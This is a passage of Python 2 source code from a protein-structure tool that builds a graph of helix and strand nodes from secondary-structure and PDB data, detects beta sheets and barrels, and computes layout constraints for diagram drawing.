nodeid - id of the node to find
Return value:
PTNode in the node list that has the supplied nodeid.
Uses data members:
(readonly) chain_list - the list of list of nodes
Raises exceptions:
KeyError if node with supplied nodeid is not found in the list
"""
# FIXME: this is just a linear search, should have a dictionary
# by id to make it efficient (or change code to not need this at all)
for nodelist in self.iter_chains():
for node in nodelist:
if node.nodeid == nodeid:
return node
raise KeyError('get_node_by_id(): ' + nodeid + ' not found')
def build_graph_from_secstruct(self, secstruct, domain):
"""
Build the list of nodes from the the supplied PTSecStruct
object. Add edges for hydrogen bonds between structural
elements also.
Parameters:
secstruct - PTSecStruct (ptsecstruct.py) object to build from
domain - PTDomain (ptdomain.py) object listing the segment(s)
that make up this domain (only one domain processed at a
time).
Uses member data (write):
chain_dict - dict of { chainid : node_list } where node_list is
list of nodes in order, built in this function
secstruct - keeps a pointer to the supplied secstruct
domainid - domain identification string
(readonly):
use_hbonds - If True make hydrogen bond graph instead of using
bridge partner information to make
sheets from strands.
pdb_struct - The Bio.PDB parsed PDB struct (atomic co-ordinates)
for this protein.
include_310_helices, include_pi_helices - if true, include
these kinds of helices so inluce them in helix
sequential numbering. Otherwise we still need to
put them in graph to ensure lines up with
tableaucreator etc. but keep them with a separate
numbering as they won't be drawn at the end.
Raises exceptions:
NoSSE_Exception if no helices or strands found
Return value:
None.
"""
self.secstruct = secstruct
self.domainid = domain.domainid
helix_num = 1
strand_num = 1
hidden_num = 1 # for pi and/or 310 helices outside visible numbering
num_helices_in_domain = 0
num_strands_in_domain = 0
#
# Build dictionary mapping (chainid, pdb_resid) to index in residue_list
# for ALL residues, not just those in this domain.
#
self.residue_list = self.get_residue_list(self.pdb_struct,
PTDomain(None, None))
self.pdb_resid_dict = {}
seq_indx = 0
while seq_indx < len(self.residue_list):
residue = self.residue_list[seq_indx]
self.pdb_resid_dict[( ptsecstruct.pdb_chainid_to_stride_chainid(
residue.get_full_id()[2]),
biopdbresid_to_pdbresseq(
residue.get_id()) )] = seq_indx
seq_indx += 1
# Note that now we are only adding elements in the supplied domain,
# so the so-called 'chains' may really be segments, i.e. subsequences
# of chains (rest of chain may be in other domain(s)
self.chain_dict = {} # dict of {chainid : node_list}
for (start_chainid, start_resnum, end_chainid, end_resnum, helixtype) \
in secstruct.helix_list:
assert(start_chainid == end_chainid) #helix must be same chain
# will consider structures in domain if first residue is in domain
if domain.is_in_domain(start_chainid,
get_int_icode(start_resnum)[0]):
num_helices_in_domain += 1
if helixtype == "H":
idprefix = "ALPHAHELIX_"
htype = "ALPHA"
this_helix_num = helix_num
helix_num += 1
elif helixtype == "I":
idprefix = "PIHELIX_"
htype = "PI"
if self.include_pi_helices:
this_helix_num = helix_num
helix_num += 1
else:
this_helix_num = hidden_num
hidden_num += 1
elif helixtype == "G":
idprefix = "310HELIX_"
htype = "310"
if self.include_310_helices:
this_helix_num = helix_num
helix_num += 1
else:
this_helix_num = hidden_num
hidden_num += 1
else: # shouldn't happen
sys.stderr.write("ERROR: bad helix type " + helixtype+"\n")
ah_node = PTSVGNodeHelix(htype,
idprefix + start_chainid+"_" +\
str(this_helix_num),
this_helix_num,
start_resnum, end_resnum, start_chainid,
self.domainid,
self.residue_list,
self.pdb_resid_dict)
ah_node.build_resname_sequence()
if not self.chain_dict.has_key(start_chainid):
self.chain_dict[start_chainid] = []
self.chain_dict[start_chainid].append(ah_node)
# we must already have handled the case of SSEs that cross
# domain boundaries (by moving whole SSE to one of the domains)
assert( domain.is_in_domain(end_chainid, get_int_icode(end_resnum)[0]) )
for (start_chainid, start_resnum, end_chainid, end_resnum) \
in secstruct.strand_list:
assert(start_chainid == end_chainid) # must be in same chain
if domain.is_in_domain(start_chainid,
get_int_icode(start_resnum)[0]):
num_strands_in_domain += 1
bs_node = PTSVGNodeStrand("STRAND_"+start_chainid +"_"+\
str(strand_num),
strand_num,
start_resnum, end_resnum, start_chainid,
self.domainid,
self.residue_list,
self.pdb_resid_dict)
strand_num += 1
bs_node.build_resname_sequence()
if not self.chain_dict.has_key(start_chainid):
self.chain_dict[start_chainid] = []
# we must already have handled the case of SSEs that cross
# domain boundaries (by moving whole SSE to one of the domains)
assert( domain.is_in_domain(end_chainid, get_int_icode(end_resnum)[0]) )
self.chain_dict[start_chainid].append(bs_node)
# raise an exception if there are no SSEs at all in this domain
if num_helices_in_domain == 0 and num_strands_in_domain == 0:
raise NoSSE_Exception
# build a dictionary of {chainid: (min_res_seq, max_res_seq)}
# which we use to determine where chain has been broken by
# domain parsing so we can label the pseudo-terminus appropriately
chain_minmax_dict = self.build_chain_minmax_dict(self.pdb_struct)
delete_chainid_list = [] # list of chainids to delete from chain_dict
for (chainid, nodelist) in self.chain_dict.iteritems():
# sort in order of start residue id ascending (all must be disjoint)
nodelist.sort()
if len(nodelist) < 1:
# There are no SSEs in this chain, get rid of it.
sys.stderr.write('WARNING: no SSEs in chain ' + chainid +
'; chain ignored\n')
delete_chainid_list.append(chainid) # don't delete while in loop
continue
else:
# Check for chain with only SSEs that will not be drawn
# (i.e. pi or 310 helices), and delete those too
found_useful_node = False
for ptnode in nodelist:
if isinstance(ptnode, PTNodeStrand):
found_useful_node = True
break
elif isinstance(ptnode, PTNodeHelix):
if ptnode.get_type() == "ALPHA":
found_useful_node = True
break
elif ((ptnode.get_type() == "310" and
self.include_310_helices) or
(ptnode.get_type() == "PI" and
self.include_pi_helices)):
found_useful_node = True
break
if not found_useful_node:
sys.stderr.write('WARNING: only pi or 310 helices in chain '
+ chainid +
'; chain ignored\n')
delete_chainid_list.append(chainid)
continue
# (note PDB residue numbers don't necessarily start at 1,
# may be higher)
# Now that we are labelling connector objects for coil regions
# with residue names and PDB sequence numbers, we need
# terminus nodes to have the lowest (N) and highest (C)
# PDB residue numbers in the chain, not the lowest/highest
# in any SSEs found.
residue_list = self.get_residue_list(self.pdb_struct,
domain, chainid)
# id of a residue in Bio.PDB is tuple (hetatm, resseqnum, icode)
lowest_res_seq = residue_list[0].get_id()[1]
highest_res_seq =residue_list[-1].get_id()[1]
# but we still need the lowest and highest sequence numbers
# in any SSEs for pseudo-terminus nodes, useed in converting
# them to real terminus nodes or else removing to make interdomain
# connectors later.
sse_lowest_res_seq=get_int_icode(nodelist[0].get_start_res_seq())[0]
sse_highest_res_seq=get_int_icode(nodelist[-1].get_end_res_seq())[0]
# get min and max res seq num of segments of this chain in domain
# which we use to determine where chain has been broken by
# domain parsing so we can label the pseudo-terminus appropriately
(domain_min_resnum, domain_max_resnum) = \
domain.get_minmax_res_seq_in_chain(chainid)
# and the lowest and highest residue number in this entire chain
min_resnum = chain_minmax_dict[chainid][0]
max_resnum = chain_minmax_dict[chainid][1]
if min_resnum < 0: # sometimes this happens, eg 2H85
min_resnum = 0
# print 'qqq',chainid,min_resnum,max_resnum
# print 'rrr',chainid,domain_min_resnum,domain_max_resnum
# TODO: this will not work if a domain can have multiple
# segments of the same chain in it with segments in between
# in other domains. This does not currently happen with
# DDOMAIN and CATH but could in general happen with other
# domain decomposition methods in future.
# add N terminus node at beginning
if domain.is_single() or domain_min_resnum == min_resnum:
if self.num_chains() > 1:
label = "N" + str(chainid).lower()
else:
label = "N"
pseudo = False
lowres = lowest_res_seq
else: # pseudo-n-terminus
label = "n" + str(domain.domainid) + str(chainid).lower()
pseudo = True
lowres = sse_lowest_res_seq
n_terminal_node = PTSVGNodeTerminus('N', pseudo,
label,
0, str(lowres - 1),
str(lowres - 1),
chainid,
self.domainid,
self.residue_list,
self.pdb_resid_dict,
True) # fake_resids
if pseudo: # record the most N-terminal SSE in the pseudo-terminus
n_terminal_node.set_adjnode(nodelist[0])
nodelist.insert(0, n_terminal_node)
# add C terminus node on end
if domain.is_single() or domain_max_resnum == max_resnum:
if self.num_chains() > 1:
label = "C" + str(chainid).lower()
else:
label = "C"
pseudo = False
highres = highest_res_seq
else: # pseudo-c-terminus
label = "c" + str(domain.domainid) + str(chainid).lower()
pseudo = True
highres = sse_highest_res_seq
c_terminal_node = PTSVGNodeTerminus('C', pseudo,
label,
1, str(highres + 1),
str(highres + 1),
chainid,
self.domainid,
self.residue_list,
self.pdb_resid_dict,
True) # fake_resids
if pseudo: # record the most C-terminal SSE in the pseudo-terminus
c_terminal_node.set_adjnode(nodelist[-1])
nodelist.append(c_terminal_node)
# delete chains from chain_dict that were marked earlier for deletion
for chainid in delete_chainid_list:
self.chain_dict.pop(chainid)
# add edges for hydrogen bonds
# uses secstruct and chainid member data
# these are used for determining which side bridge partners are
# on (and also for drawing a hydrogen bond graph if requested)
self.add_hbond_edges_from_secstruct()
# add edges for bridge partners
# uses secstruct and chainid member data
self.add_bridge_edges_from_secstruct()
def build_chain_minmax_dict(self, pdb_struct):
"""
build a dictionary of {chainid: (min_res_seq, max_res_seq)}
which we use to determine where chain has been broken by
domain parsing so we can label the pseudo-terminus appropriately
Parameters:
pdb_struct - The Bio.PDB parsed PDB struct (atomic co-ordinates)
for this protein.
Return value:
dictionary of {chainid : (min_res_seq, max_res_seq)}
mapping chainidentifier to minimum and maximum residue
sequence numbers in that chain, as determined by
Bio.PDB PDB parser (pdb_struct parameter)
Note: uses no data members (need not be a member function)
"""
chain_minmax_dict = {}
pdb_model = pdb_struct[0] # TODO always using model 0 for now
for chain in pdb_model:
# id of a residue in Bio.PDB is tuple (hetatm, resseqnum, icode)
res_seqnum_list = [ res.get_id()[1] for res in chain.get_list()
if res.get_id()[0] == ' ' ]
if len(res_seqnum_list) > 0:
min_res_seq = min(res_seqnum_list)
max_res_seq = max(res_seqnum_list)
chain_minmax_dict[ptsecstruct.pdb_chainid_to_stride_chainid( \
chain.get_id())] = (min_res_seq, max_res_seq)
return chain_minmax_dict
def num_chains(self):
"""
Return the number of chains read from the PDB in this object.
Parameters: Nonde
Return value: Number of chains represented in this graph
Uses data members (readonly):
chain_dict - dictionary of { chainid : nodelist }
"""
return len(self.chain_dict)
def add_hbond_edges_from_secstruct(self):
"""
Add edges between structural elements for hydrogen bonds between
those nodes. Called by build_graph_from_secstruct().
NB: adds bonds between STRANDs only, not between HELIXes (helices).
Parameters: None.
Return value: None.
Uses data members:
readonly:
secstruct - PTSecStruct object to get hbonds from
chainid - chainid of chain in PTSecStruct to use
read/write:
chain_dict - dict by chainid of
list of nodes (changes node data, not list as such)
Precondition: each nodelist in chain_dict
is sorted (by start res seq ascending);
this is done by build_graph_from_secstruct()
before calling.
"""
hbond_list = self.secstruct.hbond_list
# TODO: do this more efficiently using presorting (ie how it used to
# be done when only one chain)
for (chainid1, resnum1, chainid2, resnum2, dist) in hbond_list:
for ptnode in self.iter_strands():
if ( chainid1 == ptnode.get_chainid() and
ptnode.is_in_interval(resnum1) ):
try:
dest_node = self.find_node_containing_seqnum(resnum2,
chainid2)
except KeyError:
# it seems STRIDE sometimes gives h bond to
# residue that does not exist - maybe because the
# chainid is wrong (puts same chainid for both
# sides even when bond is between chains? - could
# recover from this if so (TODO). e.g. 1EAI, 1ABI
sys.stderr.write('WARNING: external program'
' reported H bond to nonexistent '
'residue ' + resnum2 +
' (chain ' + chainid2 + ')\n')
continue
if dest_node != None and \
isinstance(dest_node, PTNodeStrand): # only STRANDs
ptnode.add_hbond(dest_node, resnum1, resnum2, dist)
def add_bridge_edges_from_secstruct(self):
"""
Add edges between strand nodes representing beta brdiges between
those nodes (add just one edge between any two strands).
Called by build_graph_from_secstruct().
NB: adds bonds between STRANDs only, not between HELIXes (helices).
Parameters: None.
Return value: None.
Uses data members:
readonly:
secstruct - PTSecStruct object to get hbonds from
chainid - chainid of chain in PTSecStruct to use
read/write:
chain_dict - dict by chainid of
list of nodes (changes node data, not list as such)
"""
bridge_list = self.secstruct.bridgeres_list
# (chainid1, resnum1, chainid2, resnum2, bdir)
# TODO: do this more efficiently using presorting (ie how it used to
# be done when only one chain)
for ptnode in self.iter_strands():
for (chainid1, resnum1, chainid2, resnum2, bdir) in bridge_list:
if ( chainid1 == ptnode.get_chainid() and
ptnode.is_in_interval(resnum1) ):
try:
dest_node = self.find_node_containing_seqnum(resnum2,
chainid2)
except KeyError:
dest_node = None
sys.stderr.write('WARNING: chain ' + chainid2 + \
' involved in beta bridge not found.'+\
'\n Probably due to domain parsing' +\
' breaking a beta sheet.\n')
if dest_node != None and \
isinstance(dest_node, PTNodeStrand): # only STRANDs
if ptnode == dest_node:
sys.stderr.write('WARNING: ignoring self-bridge ' +
ptnode.nodeid + '\n')
else:
ptnode.add_bridge(dest_node, bdir)
def get_residue_list(self, pdb_struct, domain, getchainid = None):
"""
Return list of Bio.PDB Residue objects in this domain, and optionally
in the specified chain.,
Parameters:
pdb_struct - Bio.PDB parsed PDB struct for the protein
domain - PTDomain (ptdomain.py) object listing the segment(s)
that make up this domain (only one domain processed at a
time).
getchainid - chain identifier to get residues in (default None -
all chains).
Return value:
list of Bio.PDB Residue objects in the domain (and optionally chain).
Raises exceptions:
NoSSE_Exception for empty structure (happens eg on d1oayi_.ent)
"""
residue_list = []
try:
pdb_model = self.pdb_struct[0] # TODO always using model 0 for now
except KeyError:
raise NoSSE_Exception
for chain in pdb_model:
chainid = ptsecstruct.pdb_chainid_to_stride_chainid(chain.get_id())
if getchainid and getchainid != chainid:
continue # this is not the chain we want
# Build a list of Bio.PDB Residue objects that are in this
# domain.
# id of a residue in Bio.PDB is tuple (hetatm, resseqnum, icode)
# so we choose those where residue PDB number
# (in the current chain) is in the domain.
# TODO: maybe should use polypeptide builder for this instead
# (and indeed should probably use it right from the beginning) -
residue_list += [ residue for residue in chain.get_unpacked_list()
if is_aa(residue) and
domain.is_in_domain(chainid, residue.get_id()[1])
]
if getchainid:
break # if getchainid specified, we now have it so can quit
return residue_list
def build_dist_matrix(self, domain):
"""
Build the PTDistMatrix member ptdistmat containing the
residue and SSE distance maps. This is built using information
from the Bio.PDB Residue objects contained in the
member pdb_struct for residues in the supplied domain which
we are working with, and (for SSEs) the secondary structures
defined by node lists under the chain_dict member built by
build_graph_from_sec_struct().
Parameters:
domain - PTDomain (ptdomain.py) object listing the segment(s)
that make up this domain (only one domain processed at a
time).
Uses member data (write):
distmatrix - the PTDistanceMatrix class containing residue and
SSE distance maps.
(readonly):
chain_dict - dict of { chainid : node_list } where node_list is
list of nodes in order, built in this function
secstruct - keeps a pointer to the supplied secstruct
pdb_struct - The Bio.PDB parsed PDB struct (atomic co-ordinates)
for this protein.
sheet_dict - dict of {sheet_id : ptnode_list} represneting sheets
Return value:
None.
"""
residue_list = self.get_residue_list(self.pdb_struct, domain)
# Also build list of all PTNodes
ptnode_list = []
for nodelist in self.iter_chains():
for node in nodelist:
if (not isinstance(node, PTNodeTerminus)): # not terminii
ptnode_list.append(node)
self.distmatrix = PTDistMatrix(residue_list, ptnode_list,
self.sheet_dict,
self.pdb_struct)
if verbose:
sys.stderr.write("SSE distmatrix:\n")
for i in range(len(self.distmatrix.sse_dist_matrix)):
for j in range(i+1):
sys.stderr.write("%3.0f " % self.distmatrix.sse_dist_matrix[i,j])
sys.stderr.write("\n")
sys.stderr.write("sheet/helix distmatrix:\n")
for i in range(len(self.distmatrix.sheet_dist_matrix)):
for j in range(i+1):
sys.stderr.write("%3.0f " % self.distmatrix.sheet_dist_matrix[i,j])
sys.stderr.write("\n")
sys.stderr.write(str(self.distmatrix.reverse_sheet_index_map)+'\n');
def build_tableau(self, pdbid, domain, use_tableaucreator):
"""
Build the tableau data member (see PTTableau in pttableau.py)
by calling function in pttableau.py.
Parameters:
pdbid - PDB identifier of the strucutre
domain - The PTDomain object for our current domain
use_tableaucreator - if True, use external TableauCreator program
Return value: None
Uses data members (WRITE):
tableau - created by this function
(readonly):
chain_dict - dict { chainid : ptnode_list } of nodes in chains
pdb_structure - Bio.PDB parsed PDB structure
"""
# Build list of all helix and strand PTNodes
ptnode_list = []
for nodelist in self.iter_chains():
for node in nodelist: # these nodes are only those in our domain
if (not isinstance(node, PTNodeTerminus)): # not terminii
ptnode_list.append(node)
if use_tableaucreator:
self.tableau = pttableau.get_tableau_from_pdbstruct(
pdbid, domain, self.pdb_struct, ptnode_list)
else:
self.tableau = pttableau.compute_tableau(ptnode_list,
self.pdb_struct)
def find_node_containing_seqnum(self, res_seqnum, chainid):
"""
Find and return node in node list for chain chainid
containing supplied PDB residue
sequence number.
Parameters:
res_seqnum - PDB residue sequence number to find node for
chainid - chain identifier to find node in
Return value:
PTNode pointer of PTNode containing the supplied residue seq num
in supplied chainid
or None if the residue is not in a structural element PTNode
Uses data members (readonly):
chain_dict - chainid dict of list of PTNodes
"""
# TODO: since node_list is sorted should use binary search here
# (maybe try the Python bisect module)
if not self.chain_dict.has_key(chainid):
return None # no such chain, can happen due to domain parsing
for ptnode in self.chain_dict[chainid]:
if ptnode.is_in_interval(res_seqnum):
return ptnode
return None
def dfs_strands(self, start_strand, visited, dfs_list, from_node,
back_edge_list,
sheet_id=None):
"""
Make a depth-first search traversal of STRAND nodes
using bridge (not sequence)
edges starting at the specfied strand.
Parameters:
start_strand - STRAND node to start at
visited - (in/out) dictionary of {ptnode:True} visited nodes
dfs_list - (in/out) list of ptnodes visited in dfs order
from_node - node from which we are being (recursively) called
back_edge_list - list of (node, node) tuples representing an
edge between the two nodes, which is a back
edge, i.e. from a node to an ancestor of that
node in the spanning tree. The back edge
means there is a cycle of which the back
edge forms a part.
sheet_id - identifier of this sheet (connected component) to mark
each strand in it with, or None to not mark at all
(default).
Recursive function. call initially as
dfslist = []
back_edge_list = []
dfs_strands(startnode, {}, dfslist, None, back_edge_list)
Return value:
None. (Output is dfs_list, back_edge_list parameters)
Uses members (readonly):
chain_dict - dict by chainid of list of PTNodes
"""
visited[start_strand] = True
if sheet_id != None:
start_strand.set_sheet_id(sheet_id)
dfs_list.append(start_strand)
for (node, bdir_unused, side_unused) in start_strand.get_bridge_list():
if node not in visited:
self.dfs_strands(node, visited, dfs_list, start_strand,
back_edge_list, sheet_id)
elif node != from_node: #not parent of start_strand in spanning tree
# don't add duplicate back edges
# ((node1,node2) is same as (node2,node1))
duplicate = False
for (a,b) in back_edge_list:
if ((start_strand == a and node == b) or
(node == a and start_strand == b)):
duplicate = True
break
if not duplicate:
if verbose:
sys.stderr.write('dfs_strands back edge from ' +
str(start_strand) + ' to ' +
str(node) +
'\n')
back_edge_list.append((start_strand, node))
def find_connected_components(self):
"""
Find the connected components (considering only STRAND nodes
and bridge [not sequence] edges in the graph).
This is done by a DFS traversal at every node in the graph
(skipping already visited ones), giving us the partition of
the graph into connected components.
Parameters: None
Uses member data:
chain_dict - dict by chainid of list
of PTNodes in the graph (modifies PTNodes not list)
(WRITE):
sheet_dict -
dictionary of { sheet_id : ptnode_list } where sheet_id is 'A',
'B', etc. and ptnode_list is a list of PTNodeStrand instances
in that connected component (sheet).
self.sheet_backedges_dict -
dict of {sheet_id : ((node1,node2))}
listing 'back edges' i.e. edges
to an ancestor in DFS spanning tree
in the connected component (sheet).
note (node1,node2) and (node2,node1)
are the same (undirected graph) and
only one of the two is present in the
Labels each strand node with the sheet id it belongs to as it goes.
"""
sheet_id = 'A' # sheet id is single alpha char A, B, etc.
# (will be a problem for more than 26 sheets... eg
# this actually happens on 2J28), wrap to lowercase
visited = {} # dictionary of {ptnode : True} visited nodes
back_edge_list = [] # list of (ptnode, ptnode) tuples for back edges
self.sheet_dict = {} # dictionary of {sheet_id : nodelist}
self.sheet_backedges_dict = {} # dict of {sheet_id : ((node1,node2))}
# listing 'back edges' i.e. edges
# to an ancestor in DFS spanning tree
# in the connected component (sheet).
# note (node1,node2) and (node2,node1)
# are the same (undirected graph) and
# only one of the two is present in the
# list.
for node in self.iter_strands():
if node not in visited:
connected_node_list = []
back_edge_list = []
self.dfs_strands(node, visited, connected_node_list, None,
back_edge_list,
sheet_id)
self.sheet_dict[sheet_id] = list(connected_node_list)
self.sheet_backedges_dict[sheet_id] = list(back_edge_list)
sheet_id = chr(ord(sheet_id)+1)
if sheet_id == '[':
sheet_id = 'a' # if go past Z, wrap to lowercase
def label_sheets(self):
"""
Label strands with sheet id to which each belongs by finding
connected components; strands in a connected componenent of
the graph (considering nonly STRAND nodes and bridge edges)
form a sheet.
Parameters: None
Uses member data:
node_list - list of nodes. Modifies nodes by labelling them.
Return value:
Returns the sheet dictionary (dictionary of
{ sheet_id : ptnode_list }) from find_connected_components.
"""
# ACtually don't do anything except call find_connected_components()
# which does the labeling itself (more efficient since it knows
# as each one is added which sheet it is added to)
return self.find_connected_components()
def label_bridge_sides(self):
"""
Label bridge edges with '+' or '-' indicating relative side of
the strand the bridge partners are on. This method just calls
label_strand_bridge_sides() (PTNodeStrand method, see documetation
there for details) for each strand to do this.
Parameters: None
Uses member data:
chain_dict - dict by chainid of
list of nodes in the graph. Not iself modified,
but edges in the PTNodeStrands (i.e. bridge_list)
in those is modified by label_strand_bridge_sides()
pdb_struct - The Bio.PDB parsed PDB struct (atomic co-ordinates)
for this protein.
Return value: None
"""
for node in self.iter_strands():
node.label_strand_bridge_sides(self.pdb_struct)
def build_constraints(self):
"""
Build constraints for all sheets. The constraints consist of strands
in a sheet being in a cluster, and strand ordering constraints
for each sheet computed by build_sheet_constraints()
The idea is that these constraints can then be used as input
to a constraint-based graph layout system (Dunnart - see
write_dunnart_svg()).
Return value: None; member data sheet_strandlists_dict is built.
Uses data members:
sheet_dict - the sheet dictionary (dictionary of
{ sheet_id : ptnode_list }) from
find_connected_components.
sheet_strandlists_dict (WRITE) -
dictionary of { sheet_id : list of list of nodes }
where the list of list of nodes is
described in build_sheet_constraints()
ptrelpos (WRITE) -
PTRelativePosition instance created to find relative
positions of elements later, using dist matrix
and sheet strand lists.
pdb_stucrt, distmatrix, tableau - passed to PTRelativePosition which
keeps a pointer to them itself.
"""
# label bridge edges + or - for relative sides of strand, as per
# Westhead et al 1999.
self.label_bridge_sides()
# now that all bridge sides are labelled, process each sheet
self.sheet_strandlists_dict = {}
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
self.sheet_strandlists_dict[sheet_id] = \
self.build_sheet_constraints(ptnode_list)
self.ptrelpos = PTRelativePosition(self.pdb_struct,
self.distmatrix,
self.sheet_strandlists_dict,
self.tableau,
self.chain_dict,
self.sheet_dict)
def build_sheet_constraints(self, ptnode_list):
"""
Build constraints, for a single sheet,
on the layout of the strand nodes based on their
sheet membership (determined by label_sheets(), which must
be called before this subroutine, and the return value from it
passed to this one).
These constraints specify that strands in a sheet are positioned
in order along a (horizontal) line. Bifurcations
in the sheet also need to be taken into account.
Strands are ordered according to their neighbour (bridge partner)
relationships, and a bifurcation results in having two (or more,
conceivably) strands both neighbours on the same side of one strand.
These can then have further neighbours of their own, indpenedently.
In addition to the data structure returned by this subroutine
defining constraints, the strand nodes themselves are annotated
with further information, such as the orientation (up or down)
of the arrown to be drawn (based on the parallel/antiparallel
relationships between adjacent strands as previously labelled
by label_bridge_sides()), and the vertical position relative to the
neighbouring strand determined by the positions (residues) on the
strands where the H-bonds forming the beta-bridges.
Parameters:
ptnode_list - list of PTNodeStrand elements for the sheet.
Return value:
list of list of PTNodeStrand.
Each element in that list is itself a list of
strands. The outermost list for horizontal (left to right)
position in the layout. The list of nodes at a given positino
in that outermost list is a list of nodes at the same
horizontal position, and each is labelled with a relative
vertical position for the layout.
This is similar to what is done in TOPS
as per Westhead et al 1999 (see Fig 5B, p. 902).
Uses data members (readonly):
sheet_backedges_dict - dict of { sheet_id : (node1, node2) }
of back edges from DFS in connected
component (sheet)
Note: also set properties in PTNodeStrand objects (reversed, align_pos)
"""
# note number of undirected edges is 1/2 number of bridge edges
# in our connected component as we have one for each direction.
num_dir_edges= sum([ node.num_neighbours() for node in ptnode_list])
assert(num_dir_edges % 2 == 0)
num_edges = num_dir_edges / 2
# because a sheet is (by definition the way we have found it)
# is a connected component, if |E| = |V| - 1 it is acyclic
# otherwise it must be cyclic, and in fact:
num_cycles = num_edges - len(ptnode_list) + 1
assert(num_cycles >= 0)
#------ debug output
if verbose:
sys.stderr.write('num nodes = ' + str(len(ptnode_list)) + '\n')
sys.stderr.write('num edges = ' + str(num_edges) + '\n')
sys.stderr.write('hence num cycles = ' +str(num_cycles) + '\n')
#------ end
if len(ptnode_list) < 2:
sys.stderr.write(
'WARNING: sheet has fewer than 2 strands (' +
str(ptnode_list[0]) + ') \n')
return [ptnode_list]
# now that we have the bridge edges labelled with relative sides,
# we can (for each sheet) use a DFS, starting at a leaf node
# (one with only one neighbour) to get the positioning of strands
# as per Westhead et al 1999 (see Fig 5, p. 902).
open_node1 = open_node2 = None
if num_cycles > 0:
# for a connected component, the number of back edges must be
# equal to the number of edges - number of nodes + 1
# (= number of (basic) cycles)
sheet_id = ptnode_list[0].get_sheet_id()
assert(num_cycles == len(self.sheet_backedges_dict[sheet_id]))
# There is at least one cycle (beta barrel) so we won't be able to
# find a strand with only one neighbour.
# We will 'open' the barrel into a sheet.
# At the moment we will 'break' a bridge arbitrarily
# (by removing each 'back edge' found in the DFS to break
# each fundamental (aka basic or basis) cycle).
# This is consistent and and guaranteed to break the cycle but
# it is rather arbitrary from a physical/chemical/biological
# point of view.
# TODO: maybe should have some more physically relevant
# criteria for choosing which
# bridge to break e.g. Hutchinson and Thornton 1990 (HERA)
# open at position which minimizes number of H-bonds broken.
sys.stdout.write("detected " + str(num_cycles) +
" beta barrel(s)\n")
for (open_node1, open_node2) in self.sheet_backedges_dict[sheet_id]:
sys.stdout.write("opened barrel by removing bridge from " +
open_node1.nodeid + " to " +
open_node2.nodeid +"\n")
open_node1.set_barrel_edge(True)
open_node2.set_barrel_edge(True)
open_node1.remove_bridge(open_node2)
# get node to start at (a node with only one neighbour)
# If a barrel was broken, start at the node where the brdige was
# removed, if that node has only one neighbour (otherwise use
# the frist node we find that does only have on neighbour)
if open_node1 != None and open_node1.num_neighbours() == 1:
start_node = open_node1
elif open_node2 != None and open_node2.num_neighbours() == 1:
start_node = open_node2
else:
start_node = None
for node in ptnode_list:
if node.num_neighbours() == 1:
start_node = node
break
assert(start_node.num_neighbours() == 1)
dfs_list = []
dfs_strands_from(start_node, {}, dfs_list, None) # in ptnode.py
#------ debug output
if verbose:
for (node, from_node) in list(dfs_list):
if from_node == None:
fm_nodeid = '<none>'
else:
fm_nodeid = from_node.nodeid
sys.stderr.write(node.nodeid+" from "+ fm_nodeid+", ")
sys.stderr.write('\n')
#------ end
nodelist = list(dfs_list) # nodelist is in DFS order
horiz_order_list = []
for i in range(len(nodelist)): # may be longer than needed
horiz_order_list.append([])
node_index_dict = {} # dictionary of { nodeid : horiz_order_list_index }
firstnode = nodelist[0][0]
firstnode.set_reversed(False)
firstnode.set_align_pos(0)
horiz_order_list[0] = [firstnode]
node_index_dict[firstnode.nodeid] = 0
prev_index = 0
prev_side = None
prev_node = None
for node_index in range(1, len(nodelist)):
(node, from_node) = nodelist[node_index]
# put node in correct position in outer list according
# to constraints on side of node it was reached from
# relative to other node adjacent to that node
found_constraint = False
fromnode_index = node_index_dict[from_node.nodeid]
cur_side = from_node.get_side_of_neighbouring_strand(node)
if cur_side != '.': # side contraints are '+' or '-'; '.' means none
prev_side = None
for (prev_node,bdir_unused,side) in from_node.get_bridge_list():
if prev_node != node:
prev_index = None
for k in range(fromnode_index + 2): #upto AFTER fromnode
if prev_node in horiz_order_list[k]:
prev_index = k
prev_side = side
if prev_side != '.': # found a constraint
found_constraint = True
break
if found_constraint:
break
if found_constraint:
if cur_side == prev_side:
horiz_order_list_index = prev_index
else:
if prev_index < fromnode_index:
horiz_order_list_index = fromnode_index + 1
else:
horiz_order_list_index = fromnode_index - 1
else:
horiz_order_list_index = fromnode_index + 1
node_index_dict[node.nodeid] = horiz_order_list_index
vert_list = horiz_order_list[horiz_order_list_index]
vert_list.append(node)
# set reversed flag depending on parallel/antiparallel relationship
if node.is_parallel(from_node):
node.set_reversed(from_node.get_reversed())
else:
node.set_reversed(not from_node.get_reversed()) # antiparallel
# set relative vertical positions of strands based on H bonds
compute_align_positions(node, from_node)
# since outer list may have been longer than needed, remove empty lists
for i in range(len(horiz_order_list)-1, -1, -1):
if horiz_order_list[i] == []:
horiz_order_list.pop(i)
#------ debug output
if verbose:
for vert_list in horiz_order_list:
for node in vert_list:
dirstr = "up"
if node.get_reversed():
dirstr = "down"
sys.stderr.write(node.nodeid + '(' + dirstr + ' ' +
str(node.get_align_pos()) + ') ')
sys.stderr.write('\n')
#------ end
return horiz_order_list
def sheet_size(self, sheet_id):
"""
Calculate the 'size' of a sheet, which is defined as the number
of residues in the sheet, i.e. the sum of the number of residues
in each strand of the sheet.
Parameters:
sheet_id - id of the sheet to find size of
Uses member data:
sheet_dict - dict of {sheet_id : ptnode_list} represneting sheets
Return value:
Number of residues in the sheet (sum of number of residues in
each strand of the sheet)
"""
return sum([strand.get_span() for strand in self.sheet_dict[sheet_id]])
def largest_sheet(self):
"""
Return the id of the 'largest' sheet int the sheet_dict, where
size of a sheet is as defined by the sheet_size() function.
Parameters: None.
Uses member data:
sheet_dict - dict of {sheet_id : ptnode_list} represneting sheets
Return value:
sheet id of the largest sheet, or None
"""
max_size = 0
max_size_sheet_id = None
for sheet_id in self.sheet_dict.iterkeys():
size = self.sheet_size(sheet_id)
if size > max_size:
max_size = size
max_size_sheet_id = sheet_id
return max_size_sheet_id
def get_orientation_sse(self):
"""
Return the SSE (strand or helix) to be used for relative orientation
of this whole PTgraph2 (domain/protein). This is the longest
strand of the largest sheet (NB not longest strand overall), or
longest helix if there is no sheet.
Parameters:
None
Return value:
PTNode which is either a PTNodeStrand or PTNodeHelix, as described
above.
Uses data members (Readonly):
sheet_dict, nodelist, ptrelpos, sheet_strandlists_dict
"""
sheet_id = self.largest_sheet()
if sheet_id != None:
(sse, length) = self.ptrelpos.get_longest_strand(
self.sheet_strandlists_dict[sheet_id])
else:
sse = self.largest_helix()
return sse
